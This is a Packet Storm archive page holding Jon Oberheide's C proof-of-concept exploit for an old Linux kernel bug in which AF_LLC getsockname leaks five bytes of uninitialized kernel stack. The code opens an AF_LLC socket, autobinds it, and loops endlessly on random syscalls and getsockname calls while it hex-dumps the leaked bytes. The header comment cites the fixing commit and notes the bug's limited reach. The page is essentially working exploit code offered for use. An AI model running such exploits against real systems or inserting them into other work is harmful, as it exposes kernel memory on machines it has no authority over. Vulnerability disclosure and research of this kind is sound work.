what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux 2.6.31-rc7 AF_LLC getsockname Stack Disclosure

Linux 2.6.31-rc7 AF_LLC getsockname Stack Disclosure
Posted Aug 25, 2009
Authored by Jon Oberheide

Linux kernel versions 2.6.31-rc7 and below AF_LLC getsockname 5-byte stack disclosure exploit.

tags | exploit, kernel
systems | linux
SHA-256 | b0e4c47e044db1a597742e8115493357309acc15b1e7785990b678662b54fbb2

Linux 2.6.31-rc7 AF_LLC getsockname Stack Disclosure

Change Mirror Download
/* 
* llc-getsockname-leak.c
*
* Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://git.kernel.org/linus/28e9fc592cb8c7a43e4d3147b38be6032a0e81bc
*
* sllc_arphrd member of sockaddr_llc might not be changed. Zero sllc
* before copying to the above layer's structure.
*
* Notes:
*
* Bug is present in <= 2.6.31-rc7, but the impact is limited to <= 2.6.24.4
* as AF_LLC sockets have been restricted to CAP_NET_RAW since then. Only 5
* bytes of uninitialized kernel stack are leaked via AF_LLC's getsockname().
*/

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <net/if_arp.h>

#ifndef AF_LLC
#define AF_LLC 26
#endif

#ifndef AF_LLC
#define AF_LLC 26
#endif

#ifndef LLC_SAP_NULL
#define LLC_SAP_NULL 0x00
#endif

#ifndef __LLC_SOCK_SIZE__
#define __LLC_SOCK_SIZE__ 16
struct sockaddr_llc {
sa_family_t sllc_family;
sa_family_t sllc_arphrd;
unsigned char sllc_test;
unsigned char sllc_xid;
unsigned char sllc_ua;
unsigned char sllc_sap;
unsigned char sllc_mac[6];
unsigned char __pad[__LLC_SOCK_SIZE__ - sizeof(sa_family_t) * 2 -
sizeof(unsigned char) * 4 - 6];
};
#endif

const int randcalls[] = {
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
__NR_sched_getparam, __NR_sched_get_priority_max
};

void
dump(const unsigned char *p, unsigned l)
{
printf("sockaddr_llc:");
while (l > 0) {
printf(" ");
if (l == 12 || l == 2) {
printf("*** ");
}
printf("%02x", *p);
if (l == 10 || l == 1) {
printf(" ***");
}
++p; --l;
}
printf("\n");
}

int
main(void)
{
struct sockaddr_llc sllc;
int ret, sock, call, sllc_len = sizeof(sllc);

printf("[+] Creating AF_LLC socket.\n");

sock = socket(AF_LLC, SOCK_DGRAM, 0);
if (sock == -1) {
printf("[-] Error: Couldn't create AF_LLC socket.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}

memset(&sllc, 0, sllc_len);

sllc.sllc_family = AF_LLC;
sllc.sllc_arphrd = ARPHRD_ETHER;
sllc.sllc_sap = LLC_SAP_NULL;

printf("[+] Dummy sendto to autobind socket.\n");

ret = sendto(sock, "LEAK", 4, 0, (struct sockaddr *) &sllc, sllc_len);
if (ret == -1) {
printf("[-] Error: sendto failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}

printf("[+] Ready to call getsockname.\n\n");

for (ret = 5; ret > 0; ret--) {
printf("%d...\n", ret);
sleep(1);
}
srand(time(NULL));

while (1) {
/* random stuff to make stack pseudo-interesting */
call = rand() % (sizeof(randcalls) / sizeof(int));
syscall(randcalls[call]);

ret = getsockname(sock, (struct sockaddr *) &sllc, &sllc_len);
if (ret != 0) {
printf("[-] Error: getsockname failed.\n");
printf("[-] %s.\n", strerror(errno));
exit(1);
}

dump((unsigned char *) &sllc, sizeof(sllc));
}

return 0;
}


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close